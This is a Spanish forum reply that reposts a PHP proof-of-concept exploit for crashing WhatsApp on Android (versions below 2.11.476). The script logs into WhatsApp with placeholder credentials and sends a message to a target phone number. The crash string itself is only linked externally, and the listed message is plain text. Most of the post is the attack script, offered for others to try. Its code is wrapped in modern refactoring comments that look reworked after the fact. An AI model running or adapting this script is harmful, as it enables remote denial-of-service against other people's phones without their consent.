interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3
Saludos!
<?php
/*
* Title: WhatsApp Remote Crash with PHP
* Product: WhatsApp
* Vendor Homepage: http://www.whatsapp.com
* Vulnerable Version(s): 2.11.476
* Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
* Mirror: http://pastebin.com/Ktu45GN0
* Date: 05/02/2015
*
* Author Exploit:
* Rodrigo Avila - @el_rodrix - <[email protected]>
* Credits:
* Daniel Godoy - @0xhielasangre - <[email protected]>
* Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
*
* Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
* http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
* http://www.exploit-db.com/exploits/35637/
* http://www.exploit-db.com/exploits/32865/
*
* A custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for Android.
* It uses the WhatsAPI library, which provides registration, reading/sending of messages, and even
* engaging in an interactive conversation over the WhatsApp protocol.
*/
require 'src/whatsprot.class.php';
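/**
 * Non-blocking read of a single line from a stream.
 *
 * Polls the stream with stream_select() and a zero timeout, so the call
 * returns at once instead of waiting for input. The error text refers to
 * STDIN, but any select()-able stream resource is accepted. Nothing in the
 * visible part of this script calls the helper.
 *
 * @param resource $pStdn Stream to poll.
 *
 * @return string|false|null Trimmed line (fgets() is capped at 1024, i.e. at
 *                           most 1023 bytes) when data is ready, false when
 *                           stream_select() fails, null when nothing is pending.
 */
function fgets_u($pStdn)
{
    // stream_select() receives its three stream arrays by reference, so each
    // one has to be a real variable. The former inline `$write = NULL`
    // expressions are not referenceable and are rejected by current PHP.
    $readable = array($pStdn);
    $writable = null;
    $exceptional = null;

    $num_changed_streams = stream_select($readable, $writable, $exceptional, 0);
    if (false === $num_changed_streams) {
        print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
        return false;
    }

    if ($num_changed_streams > 0) {
        return trim(fgets($pStdn, 1024));
    }

    // Zero ready streams: no input is waiting right now.
    return null;
}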
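// ---- Configuration ---------------------------------------------------------
// The account values below are placeholders (runs of X). Credentials kept in
// the source file are readable by anyone who can read the script.
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
// As committed, $msg is plain ASCII text; the non-printable message described
// in the file header is not part of this listing.
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";

// ---- Argument validation ---------------------------------------------------
if ($argc < 2) {
    echo $usage;
    exit(1);
}

$dst = $_SERVER['argv'][1];

// The usage text asks for digits only. is_numeric() also accepted signs,
// decimal points, exponents and leading whitespace, so the argument is now
// matched against exactly 13 ASCII digits (the length the script has always
// required). Every rejected argument ends with a non-zero exit status, where
// the script previously printed the usage text and still exited with 0.
if (preg_match('/^[0-9]{13}\z/', $dst) !== 1) {
    echo $usage;
    exit(1);
}

// ---- Session ---------------------------------------------------------------
echo "[] Logging in as '$nickname' ($sender)\n";
// WhatsProt comes from src/whatsprot.class.php (WhatsAPI); the meaning of the
// fourth constructor argument is not visible here — presumably a debug switch,
// confirm against the library.
$wa = new WhatsProt($sender, $imei, $nickname, false);
$wa->connect();
$wa->loginWithPassword($password);
echo "\n[] Send message to $dst: $msg\n";
$wa->sendMessage($dst , $msg);
echo "\n";
exit(0);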